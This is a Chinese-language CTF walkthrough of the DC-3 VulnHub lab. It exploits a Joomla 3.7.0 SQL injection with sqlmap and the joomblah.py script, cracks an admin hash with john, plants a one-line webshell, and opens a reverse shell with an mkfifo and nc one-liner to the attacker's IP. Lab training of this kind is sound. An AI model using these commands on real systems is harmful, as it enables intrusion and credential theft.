DC系列:3(DC-3靶机,初级渗透详细教程)

环境搭建

当出现DE 设备 (磁盘/CD-ROM)配置不正确。“ide0:1”上具有一个 IDE 从设备,但没有主设备。此配置在虚拟机中无法正常运行。请使用配置编辑器将磁盘/CD-ROM 从“ide0:1”移到“ide0:0”。错误时,
将IDE改为0:0即可
在这里插入图片描述

详情

名称DC- 3
发布日期2020年4月25日
作者DCAU
系列DC
网页https://www.vulnhub.com/entry/dc-32,312/

描述

DC-3是另一个专门构建的易受攻击的实验室,旨在获得渗透测试领域的经验。
与以前的DC版本一样,这个版本在设计时考虑到了初学者,尽管这一次只有一个标志,一个入口点,根本没有线索。
Linux技能和对Linux命令行的熟悉程度是必须的,基本的渗透测试工具的一些经验也是必须的。
对于初学者来说,Google可以提供很大的帮助,但你可以随时在@DCAU7上发推文给我,寻求帮助,让你再次前进。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。
对于那些有CTF和Boot2Root挑战经验的人来说,这可能根本不会花费你很长时间(事实上,它可能需要不到20分钟的时间)。
如果是这样的话,如果你希望它成为一个更大的挑战,你可以随时重做挑战,并探索其他获得根和获得旗帜的方法。

使用工具

攻击者:kali 192.168.10.153
靶机:dc-3 192.168.10.161

一:信息收集

0x01 查看存活主机

arp-scan -l 二层主机扫描,主动发送ARP包进行嗅探

在这里插入图片描述

0x02查看开放端口

masscan --rate=100000 --ports 0-65535 192.168.10.161

在这里插入图片描述

0x03 查看端口服务

nmap -sV -T4 -O -p 80 192.168.10.161

在这里插入图片描述

0x04 下载joomscan

apt install joomscan

在这里插入图片描述

0x05查看joomscan版本信息

joomscan -u http://192.168.10.161

在这里插入图片描述

二:漏洞发现

查看版本漏洞

searchsploit joomla 3.7.0

在这里插入图片描述

cat webapps/42033.txt

在这里插入图片描述

漏洞利用

方法一:sql注入

提示使用sql注入

sqlmap -u
“http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”
–risk=3 --level=5 --random-agent --dbs -p list[fullordering]

查库名

1:sqlmap -u "http://192.168.10.161/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述

查表名

2:sqlmap -u "http://192.168.10.161/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb  --tables  -p list[fullordering]

在这里插入图片描述

查列名

3:sqlmap -u "http://192.168.10.161/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  --risk=3 --level=5 --random-agent -D joomladb  -T "#__users" --columns   -p list[fullordering]

在这里插入图片描述

查找字段信息

4:sqlmap -u "http://192.168.10.161/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  --risk=3 --level=5 --random-agent -D joomladb  -T "#__users" -C "name,password,username" --dump   -p list[fullordering]

在这里插入图片描述

方法二:使用joomblah脚本

下载 joomblah.py 脚本

wget
https://raw.githubusercontent.com/XiphosResearch/exploits/master/Joomblah/joomblah.py

在这里插入图片描述

执行joomblah获得密码密文

python2 joomblah.py http://192.168.10.161
在这里插入图片描述

破解加密

0x01 保存密文文件

vim adminhash.txt
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

0x02 识别hash类型并破解

john adminhash.txt
john --show adminhash.txt

在这里插入图片描述

0x03 写入一句话木马

进入网站,写入一句话木马
在这里插入图片描述

0x04 蚁剑直连

0x05 反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.153 443 >/tmp/f

在这里插入图片描述

四:提权

0x01 查看版本信息

在这里插入图片描述

0x02 查看版本漏洞

在这里插入图片描述

0x03 下载漏洞执行压缩包

在这里插入图片描述

0x04 解压执行payload

在这里插入图片描述

0x05 获取flag

在这里插入图片描述

在这里插入图片描述

总结

这个靶机考察了使用者对于cms的利用手段,hash密文爆破方式,sqlmap的使用方式,对于漏洞的利用能力

  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值